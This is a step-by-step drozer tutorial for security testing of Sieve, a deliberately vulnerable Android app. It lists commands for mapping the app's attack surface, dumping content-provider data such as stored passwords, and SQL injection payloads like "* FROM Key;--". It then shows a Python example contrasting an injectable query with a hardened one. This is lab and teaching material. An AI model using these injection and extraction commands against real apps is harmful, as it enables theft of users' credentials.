First, install and start
1. Installation
Step one: download drozer from http://mwr.to/drozer (Windows installer)
Step two: install agent.apk on your Android device
adb install agent.apk
2. Start
Step one: on the PC, use adb to forward the port used by drozer, 31415
adb forward tcp:31415 tcp:31415
Step two: start the drozer Agent on your Android device
Select Embedded Server, then Enable
Step three: open the drozer console on the PC
Second, the test steps
1. Get the package name
dz> run app.package.list -f sieve
com.mwr.example.sieve
2. Get basic information about your app
run app.package.info -a com.mwr.example.sieve
3. Identify the attack surface
run app.package.attacksurface com.mwr.example.sieve
4. Activity
(1) Get activity information
run app.activity.info -a com.mwr.example.sieve
(2) Start an activity
run app.activity.start --component com.mwr.example.sieve
dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY] [--component PACKAGE COMPONENT] [--data-uri DATA_URI] [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]] [--mimetype MIMETYPE]
5. Content Provider
(1) Get content provider information
run app.provider.info -a com.mwr.example.sieve
(2) Content providers (data leakage)
First, get all the URIs you can access:
run scanner.provider.finduris -a com.mwr.example.sieve
Then get the data behind each URI:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
If the query returns data, the provider has a data leakage vulnerability.
(3) Content providers (SQL injection)
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
An error in the response indicates that there is a SQL injection.
List all tables:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
Get the data in a table (such as Key):
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
(4) Simultaneous detection of SQL injection and directory traversal
run scanner.provider.injection -a com.mwr.example.sieve
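Why the projection and selection probes in (3) work, and what stops them, shown as an added example (not code from the original page, from drozer or from Sieve). It models a provider's query() in Python with sqlite3; the schema, rows, function names and column allow-list are constructed assumptions.

```python
import sqlite3

ALLOWED_COLUMNS = ("service", "username", "password")  # assumed column names

def make_db():
    """Constructed schema and rows standing in for the provider's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords (service TEXT, username TEXT, password TEXT);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES ('mail', 'alice', 'constructed-secret');
        INSERT INTO Key VALUES ('constructed-master', '0000');
    """)
    return db

def query_vulnerable(db, projection, selection=None):
    """Pastes caller-supplied projection and selection into the SQL text."""
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    if selection:
        sql += " WHERE " + selection
    return db.execute(sql).fetchall()

def query_hardened(db, projection, service=None):
    """Accepts only known column names and binds the filter value."""
    unknown = [c for c in projection if c not in ALLOWED_COLUMNS]
    if unknown or not projection:
        raise ValueError("rejected projection: %r" % (unknown,))
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    args = ()
    if service is not None:
        sql += " WHERE service = ?"  # value is bound, never concatenated
        args = (service,)
    return db.execute(sql, args).fetchall()

def outcome(fn, *args):
    """Runs one probe and returns its rows, or the exception class name."""
    try:
        return fn(*args)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    # The same inputs the drozer commands above pass as --projection.
    for proj in (["'"], ["* FROM Key;--"], ["username"]):
        print(proj, outcome(query_vulnerable, db, proj),
              outcome(query_hardened, db, proj))
```

In the vulnerable form the single quote surfaces as a database error and the crafted projection reads another table; in the hardened form both are rejected before any SQL is built.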
6. Service
(1) Get service details
run app.service.info -a com.mwr.example.sieve
7. Other modules
tools.file.download: upload/download files
tools.setup.minimalsu: install available binaries